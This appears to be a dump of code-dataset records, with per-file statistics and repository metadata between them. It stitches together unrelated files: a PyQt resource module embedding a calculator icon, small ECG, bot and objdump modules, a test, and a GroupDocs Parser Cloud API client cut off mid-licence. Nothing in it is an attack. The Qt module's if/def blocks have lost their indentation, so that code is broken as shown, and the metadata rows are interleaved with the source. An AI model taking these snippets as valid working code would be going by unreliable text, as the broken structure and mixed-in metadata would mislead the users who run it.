\x00\x00\x00\x00\x02\x35\x35\x35\x30\xec\xec\xec\xee\xf4\xf2\xf4\
\xff\x46\x20\x3e\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\
\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\
\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\
\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\
\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\
\xff\x2b\x00\x22\xff\x6e\x50\x68\xff\xff\xff\xff\xff\xd5\xd5\xd5\
\xcc\x09\x09\x09\x1c\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x9a\x9a\x9a\x77\xfc\xfc\xfc\
\xfe\xd2\xc9\xd0\xff\x32\x09\x29\xff\x2b\x00\x22\xff\x2b\x00\x22\
\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\
\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\
\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\
\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\
\xff\x47\x22\x3f\xff\xef\xec\xee\xff\xf3\xf3\xf3\xf7\x63\x63\x63\
\x4a\x00\x00\x00\x09\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x16\xc1\xc1\xc1\
\xae\xfe\xfe\xfe\xff\xbf\xb3\xbd\xff\x31\x07\x28\xff\x2b\x00\x22\
\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\
\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\
\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\
\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x42\x1c\x3a\
\xff\xe0\xda\xdf\xff\xfb\xfb\xfb\xfe\x9e\x9e\x9e\x7c\x00\x00\x00\
\x11\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x17\x17\x17\
\x20\xcd\xcd\xcd\xc0\xfe\xfe\xfe\xff\xcc\xc1\xc9\xff\x3f\x18\x37\
\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\
\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\
\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\
\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x56\x34\x4f\xff\xe6\xe1\xe5\
\xff\xfc\xfc\xfc\xfe\xaf\xaf\xaf\x93\x00\x00\x00\x17\x00\x00\x00\
\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\
\x03\x17\x17\x17\x21\xc2\xc2\xc2\xb0\xfd\xfd\xfd\xfe\xee\xea\xed\
\xff\x7b\x60\x76\xff\x2c\x02\x24\xff\x2b\x00\x22\xff\x2b\x00\x22\
\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\
\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\
\xff\x34\x0b\x2c\xff\x99\x84\x94\xff\xfa\xf9\xf9\xff\xf6\xf6\xf6\
\xfb\xa5\xa5\xa5\x86\x00\x00\x00\x17\x00\x00\x00\x02\x00\x00\x00\
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x00\x02\x00\x00\x00\x17\x9c\x9c\x9c\x7a\xee\xee\xee\
\xf0\xff\xff\xff\xff\xdf\xd8\xdd\xff\x8a\x72\x85\xff\x46\x21\x3f\
\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\
\xff\x2b\x00\x22\xff\x2c\x01\x23\xff\x54\x32\x4d\xff\x9c\x88\x98\
\xff\xee\xeb\xee\xff\xfe\xfe\xfe\xff\xe1\xe1\xe1\xdf\x79\x79\x79\
\x5a\x00\x00\x00\x13\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x3c\x3c\x3c\
\x33\xbb\xbb\xbb\x9e\xeb\xeb\xeb\xf1\xfe\xfe\xfe\xff\xff\xff\xff\
\xff\xea\xe5\xe9\xff\xcb\xc0\xc8\xff\xbc\xae\xb9\xff\xbe\xb1\xbb\
\xff\xd0\xc7\xce\xff\xf2\xef\xf1\xff\xff\xff\xff\xff\xfd\xfd\xfd\
\xff\xe4\xe4\xe4\xe3\xa6\xa6\xa6\x85\x15\x15\x15\x24\x00\x00\x00\
\x0a\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\
\x02\x00\x00\x00\x0e\x1f\x1f\x1f\x28\x94\x94\x94\x6e\xc6\xc6\xc6\
\xab\xdb\xdb\xdb\xd5\xe7\xe7\xe7\xee\xee\xee\xee\xf7\xed\xed\xed\
\xf6\xe4\xe4\xe4\xea\xd7\xd7\xd7\xcd\xbe\xbe\xbe\x9f\x7b\x7b\x7b\
\x5d\x07\x07\x07\x20\x00\x00\x00\x0c\x00\x00\x00\x02\x00\x00\x00\
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\
\x0e\x00\x00\x00\x16\x08\x08\x08\x1d\x07\x07\x07\x24\x07\x07\x07\
\x23\x09\x09\x09\x1c\x00\x00\x00\x15\x00\x00\x00\x0d\x00\x00\x00\
\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xe0\x07\
\xff\xff\x00\x00\xff\xfe\x00\x00\x7f\xf8\x00\x00\x1f\xf0\x00\x00\
\x0f\xe0\x00\x00\x07\xe0\x00\x00\x07\xc0\x00\x00\x03\x80\x00\x00\
\x01\x80\x00\x00\x01\x80\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x80\x00\x00\x01\x80\x00\x00\x01\x80\x00\x00\x01\xc0\x00\x00\
\x03\xe0\x00\x00\x07\xe0\x00\x00\x07\xf0\x00\x00\x0f\xf8\x00\x00\
\x1f\xfe\x00\x00\x7f\xff\x00\x00\xff\xff\xe0\x07\xff\
"
qt_resource_name = b"\
\x00\x05\
\x00\x6f\xa6\x53\
\x00\x69\
\x00\x63\x00\x6f\x00\x6e\x00\x73\
\x00\x13\
\x01\x47\x5b\xbf\
\x00\x63\
\x00\x61\x00\x6c\x00\x63\x00\x75\x00\x6c\x00\x61\x00\x74\x00\x6f\x00\x72\x00\x2d\x00\x69\x00\x63\x00\x6f\x00\x6e\x00\x2e\x00\x69\
\x00\x63\x00\x6f\
"
qt_resource_struct_v1 = b"\
\x00\x00\x00\x00\x00\x02\x00\x00\x00\x01\x00\x00\x00\x01\
\x00\x00\x00\x00\x00\x02\x00\x00\x00\x01\x00\x00\x00\x02\
\x00\x00\x00\x10\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\
"
qt_resource_struct_v2 = b"\
\x00\x00\x00\x00\x00\x02\x00\x00\x00\x01\x00\x00\x00\x01\
\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x00\x00\x02\x00\x00\x00\x01\x00\x00\x00\x02\
\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x10\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\
\x00\x00\x01\x7b\xd4\x61\x0d\xca\
"
qt_version = [int(v) for v in QtCore.qVersion().split('.')]
if qt_version < [5, 8, 0]:
rcc_version = 1
qt_resource_struct = qt_resource_struct_v1
else:
rcc_version = 2
qt_resource_struct = qt_resource_struct_v2
def qInitResources():
QtCore.qRegisterResourceData(rcc_version, qt_resource_struct, qt_resource_name, qt_resource_data)
def qCleanupResources():
QtCore.qUnregisterResourceData(rcc_version, qt_resource_struct, qt_resource_name, qt_resource_data)
qInitResources()
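# --- Usage sketch (appended example, not part of the generated resource file) ---
# qInitResources() above registers the embedded data with Qt's resource system
# on import. The qt_resource_name bytes decode to the prefix "icons" and the
# file "calculator-icon.ico", so the icon should be reachable as a resource
# path; a hedged example:
#   from PyQt5 import QtGui
#   icon = QtGui.QIcon(":/icons/calculator-icon.ico")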
| 58.941718 | 129 | 0.727244 | 4,575 | 19,215 | 3.04612 | 0.063388 | 0.443886 | 0.587687 | 0.700057 | 0.731702 | 0.692738 | 0.680181 | 0.661668 | 0.654994 | 0.634974 | 0 | 0.315977 | 0.021494 | 19,215 | 325 | 130 | 59.123077 | 0.425221 | 0.00791 | 0 | 0.372168 | 0 | 0.889968 | 0.000052 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0.006472 | false | 0 | 0.003236 | 0 | 0.009709 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
fd7bfd56910454c24e99382e2efb0ceb04d9fd0f | 328 | py | Python | pysigpro/ecg/__init__.py | Ashwiinii/pysigpro | dcdb26c3389117851f6891f9720d1e9ee2fd88c8 | [
"MIT"
] | 1 | 2022-01-09T14:47:36.000Z | 2022-01-09T14:47:36.000Z | pysigpro/ecg/__init__.py | Ashwiinii/pysigpro | dcdb26c3389117851f6891f9720d1e9ee2fd88c8 | [
"MIT"
] | null | null | null | pysigpro/ecg/__init__.py | Ashwiinii/pysigpro | dcdb26c3389117851f6891f9720d1e9ee2fd88c8 | [
"MIT"
] | 2 | 2021-12-09T14:44:34.000Z | 2021-12-12T18:43:53.000Z | from .ecg_features import get_time_domain_features, get_geometrical_features, get_sample_entropy
from .preprocessing import remove_ecg_outliers, is_outlier, remove_ectopic_beats
__all__ = ['get_time_domain_features', 'get_geometrical_features', 'get_sample_entropy', 'remove_ecg_outliers', 'is_outlier', 'remove_ectopic_beats'] | 82 | 149 | 0.859756 | 44 | 328 | 5.75 | 0.409091 | 0.173913 | 0.102767 | 0.166008 | 0.814229 | 0.814229 | 0.814229 | 0.814229 | 0.466403 | 0.466403 | 0 | 0 | 0.060976 | 328 | 4 | 149 | 82 | 0.821429 | 0 | 0 | 0 | 0 | 0 | 0.349544 | 0.145897 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.666667 | 0 | 0.666667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 7 |
4754f1dbf70cb7dc4f2c0b5b3a78bd266e9f4087 | 116 | py | Python | __init__.py | windowsboy111/merlin-py | 358a8fb3612b79af8cd1497b70463c712139d9e0 | [
"MIT"
] | 3 | 2020-12-24T17:05:09.000Z | 2021-03-04T21:15:15.000Z | __init__.py | windowsboy111/merlin | 358a8fb3612b79af8cd1497b70463c712139d9e0 | [
"MIT"
] | 19 | 2020-06-26T23:39:49.000Z | 2021-01-27T13:11:10.000Z | __init__.py | windowsboy111/merlin | 358a8fb3612b79af8cd1497b70463c712139d9e0 | [
"MIT"
] | 4 | 2020-06-27T05:37:35.000Z | 2020-07-10T03:20:23.000Z | from src.bot import bot, chat, cogs, get_logger, get_prefix, cmd_handle_log, cmd_handle_warn, nlog, slog, event_log
| 58 | 115 | 0.801724 | 21 | 116 | 4.095238 | 0.761905 | 0.209302 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.112069 | 116 | 1 | 116 | 116 | 0.834951 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
47db574015a1ced288145ad2508164242a720e42 | 129 | py | Python | cargo_fuzz_sourcer/utils.py | MatejKastak/cargo-fuzz-sourcer | 12a4022213ede62a18b3deb7d00148bcc5c828bf | [
"MIT"
] | null | null | null | cargo_fuzz_sourcer/utils.py | MatejKastak/cargo-fuzz-sourcer | 12a4022213ede62a18b3deb7d00148bcc5c828bf | [
"MIT"
] | null | null | null | cargo_fuzz_sourcer/utils.py | MatejKastak/cargo-fuzz-sourcer | 12a4022213ede62a18b3deb7d00148bcc5c828bf | [
"MIT"
] | null | null | null | def objdump_is_available() -> bool:
"""Check if the `objdump` is installed."""
# TODO: Perform the check
return True
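# Hedged usage sketch: gate an objdump-dependent step on availability.
if __name__ == "__main__":
    if objdump_is_available():
        print("objdump found on PATH")
    else:
        print("objdump missing; install binutils (or equivalent) first")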
| 25.8 | 46 | 0.651163 | 17 | 129 | 4.823529 | 0.764706 | 0.219512 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.224806 | 129 | 4 | 47 | 32.25 | 0.82 | 0.472868 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.25 | 0 | 1 | 0.5 | true | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 7 |
9a345bf94769f32833269ecfbbec6b0f2ecfff41 | 120 | py | Python | test/test_utils.py | ownport/datastax-cassandra-deploy | 5eeb24f09ea7ae63f6234c75279f3592b4557400 | [
"Apache-2.0"
] | 1 | 2019-06-11T12:49:35.000Z | 2019-06-11T12:49:35.000Z | test/test_utils.py | ownport/datastax-cassandra-deploy | 5eeb24f09ea7ae63f6234c75279f3592b4557400 | [
"Apache-2.0"
] | null | null | null | test/test_utils.py | ownport/datastax-cassandra-deploy | 5eeb24f09ea7ae63f6234c75279f3592b4557400 | [
"Apache-2.0"
] | null | null | null |
from datastax_cassandra_deploy.utils import pretty_json
def test_pretty_json():
assert pretty_json({}) == '{}'
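# A second, hedged check: it assumes only that pretty_json returns valid JSON
# text (the exact indentation style is deliberately not asserted).
import json

def test_pretty_json_roundtrip():
    rendered = pretty_json({'status': 'ok'})
    assert json.loads(rendered) == {'status': 'ok'}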
| 13.333333 | 55 | 0.725 | 15 | 120 | 5.4 | 0.733333 | 0.37037 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.158333 | 120 | 8 | 56 | 15 | 0.80198 | 0 | 0 | 0 | 0 | 0 | 0.016949 | 0 | 0 | 0 | 0 | 0 | 0.333333 | 1 | 0.333333 | true | 0 | 0.333333 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
d05ca19bf2023a99f9a0a1da5e657a770745ff68 | 18,592 | py | Python | groupdocs_parser_cloud/apis/parse_api.py | groupdocs-parser-cloud/groupdocs-parser-cloud-python | e306362857cb78b17a5dc73a3bf707cbc6876ca3 | [
"MIT"
] | 1 | 2021-12-20T20:27:12.000Z | 2021-12-20T20:27:12.000Z | groupdocs_parser_cloud/apis/parse_api.py | groupdocs-parser-cloud/groupdocs-parser-cloud-python | e306362857cb78b17a5dc73a3bf707cbc6876ca3 | [
"MIT"
] | null | null | null | groupdocs_parser_cloud/apis/parse_api.py | groupdocs-parser-cloud/groupdocs-parser-cloud-python | e306362857cb78b17a5dc73a3bf707cbc6876ca3 | [
"MIT"
] | 1 | 2021-09-05T17:46:05.000Z | 2021-09-05T17:46:05.000Z | # coding: utf-8
# -----------------------------------------------------------------------------------
# <copyright company="Aspose Pty Ltd" file="parser_api.py">
# Copyright (c) 2003-2019 Aspose Pty Ltd
# </copyright>
# <summary>
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# </summary>
# -----------------------------------------------------------------------------------
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from groupdocs_parser_cloud.auth import Auth
from groupdocs_parser_cloud.api_client import ApiClient
from groupdocs_parser_cloud.api_exception import ApiException
from groupdocs_parser_cloud.configuration import Configuration
class ParseApi(object):
"""
GroupDocs.Parser Cloud API
:param configuration: API configuration
"""
def __init__(self, configuration):
api_client = ApiClient(configuration)
self.auth = Auth(configuration, api_client)
self.api_client = api_client
self.configuration = configuration
def close(self): # noqa: E501
"""
Closes thread pool. This method should be called when
methods are executed asynchronously (is_async=True is passed as parameter)
and this instance of ParseApi is not going to be used any more.
"""
if self.api_client is not None:
if(self.api_client.pool is not None):
self.api_client.pool.close()
self.api_client.pool.join()
self.api_client.pool = None
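    # Hedged async usage sketch (comments only): the object returned with
    # is_async=True is assumed to behave like a multiprocessing AsyncResult,
    # i.e. to expose .get(); app_sid/app_key below are placeholders.
    #   api = ParseApi.from_keys(app_sid, app_key)
    #   async_result = api.text(request, is_async=True)
    #   text_result = async_result.get()
    #   api.close()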
@classmethod
def from_keys(cls, app_sid, app_key):
"""
Initializes new instance of ParseApi with API keys
:param app_sid Application identifier (App SID)
:param app_key Application private key (App Key)
"""
configuration = Configuration(app_sid, app_key)
return ParseApi(configuration)
@classmethod
def from_config(cls, configuration):
"""
Initializes new instance of ParseApi with configuration options
:param configuration API configuration
"""
return ParseApi(configuration)
def images(self, request,**kwargs): # noqa: E501
"""Extract images from document. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass is_async=True
:param is_async bool
:param ImagesOptions options: Extract image options. (required)
:return: ImagesResult
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('is_async'):
return self._images_with_http_info(request, **kwargs) # noqa: E501
(data) = self._images_with_http_info(request, **kwargs) # noqa: E501
return data
def _images_with_http_info(self, request, **kwargs): # noqa: E501
"""Extract images from document. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass is_async=True
:param is_async bool
:param ImagesRequest request object with parameters
:return: ImagesResult
If the method is called asynchronously,
returns the request thread.
"""
params = locals()
params['is_async'] = ''
params['_return_http_data_only'] = False
params['_preload_content'] = True
params['_request_timeout'] = ''
for key, val in six.iteritems(params['kwargs']):
if key not in params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method images" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'options' is set
if request.options is None:
raise ValueError("Missing the required parameter `options` when calling `images`") # noqa: E501
collection_formats = {}
path = '/parser/images'
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = []
body_params = None
if request.options is not None:
body_params = request.options
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
call_kwargs = {
'resource_path':path,
'method':'POST',
'path_params':path_params,
'query_params':query_params,
'header_params':header_params,
'body':body_params,
'post_params':form_params,
'files':local_var_files,
'response_type':'ImagesResult', # noqa: E501
'auth_settings':self.auth.get_auth_settings(),
'is_async':params.get('is_async'),
'_return_http_data_only':params.get('_return_http_data_only'),
'_preload_content':params.get('_preload_content', True),
'_request_timeout':params.get('_request_timeout'),
'collection_formats':collection_formats
}
return self.api_client.call_api(**call_kwargs) # noqa: E501
def parse(self, request,**kwargs): # noqa: E501
"""Extract document data by a predefined template. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass is_async=True
:param is_async bool
:param ParseOptions options: Parse options. (required)
:return: ParseResult
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('is_async'):
return self._parse_with_http_info(request, **kwargs) # noqa: E501
(data) = self._parse_with_http_info(request, **kwargs) # noqa: E501
return data
def _parse_with_http_info(self, request, **kwargs): # noqa: E501
"""Extract document data by a predefined template. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass is_async=True
:param is_async bool
:param ParseRequest request object with parameters
:return: ParseResult
If the method is called asynchronously,
returns the request thread.
"""
params = locals()
params['is_async'] = ''
params['_return_http_data_only'] = False
params['_preload_content'] = True
params['_request_timeout'] = ''
for key, val in six.iteritems(params['kwargs']):
if key not in params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method parse" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'options' is set
if request.options is None:
raise ValueError("Missing the required parameter `options` when calling `parse`") # noqa: E501
collection_formats = {}
path = '/parser/parse'
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = []
body_params = None
if request.options is not None:
body_params = request.options
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
call_kwargs = {
'resource_path':path,
'method':'POST',
'path_params':path_params,
'query_params':query_params,
'header_params':header_params,
'body':body_params,
'post_params':form_params,
'files':local_var_files,
'response_type':'ParseResult', # noqa: E501
'auth_settings':self.auth.get_auth_settings(),
'is_async':params.get('is_async'),
'_return_http_data_only':params.get('_return_http_data_only'),
'_preload_content':params.get('_preload_content', True),
'_request_timeout':params.get('_request_timeout'),
'collection_formats':collection_formats
}
return self.api_client.call_api(**call_kwargs) # noqa: E501
def text(self, request,**kwargs): # noqa: E501
"""Extract text from document. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass is_async=True
:param is_async bool
:param TextOptions options: Extract text options. (required)
:return: TextResult
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('is_async'):
return self._text_with_http_info(request, **kwargs) # noqa: E501
(data) = self._text_with_http_info(request, **kwargs) # noqa: E501
return data
def _text_with_http_info(self, request, **kwargs): # noqa: E501
"""Extract text from document. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass is_async=True
:param is_async bool
:param TextRequest request object with parameters
:return: TextResult
If the method is called asynchronously,
returns the request thread.
"""
params = locals()
params['is_async'] = ''
params['_return_http_data_only'] = False
params['_preload_content'] = True
params['_request_timeout'] = ''
for key, val in six.iteritems(params['kwargs']):
if key not in params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method text" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'options' is set
if request.options is None:
raise ValueError("Missing the required parameter `options` when calling `text`") # noqa: E501
collection_formats = {}
path = '/parser/text'
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = []
body_params = None
if request.options is not None:
body_params = request.options
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
call_kwargs = {
'resource_path':path,
'method':'POST',
'path_params':path_params,
'query_params':query_params,
'header_params':header_params,
'body':body_params,
'post_params':form_params,
'files':local_var_files,
'response_type':'TextResult', # noqa: E501
'auth_settings':self.auth.get_auth_settings(),
'is_async':params.get('is_async'),
'_return_http_data_only':params.get('_return_http_data_only'),
'_preload_content':params.get('_preload_content', True),
'_request_timeout':params.get('_request_timeout'),
'collection_formats':collection_formats
}
return self.api_client.call_api(**call_kwargs) # noqa: E501
    def __downcase_first_letter(self, s):
        # Lower-case the first letter; an empty string passes through unchanged.
        if len(s) == 0:
            return s
        else:
            return s[0].lower() + s[1:]
# coding: utf-8
# --------------------------------------------------------------------------------
# <copyright company="Aspose Pty Ltd" file="images_request.py">
# Copyright (c) 2003-2019 Aspose Pty Ltd
# </copyright>
# <summary>
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# </summary>
# --------------------------------------------------------------------------------
class ImagesRequest(object):
"""
Request model for images operation.
:param options Extract image options.
"""
def __init__(self, options):
"""Initializes new instance of ImagesRequest.""" # noqa: E501
self.options = options
# coding: utf-8
# --------------------------------------------------------------------------------
# <copyright company="Aspose Pty Ltd" file="parse_request.py">
# Copyright (c) 2003-2019 Aspose Pty Ltd
# </copyright>
# <summary>
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
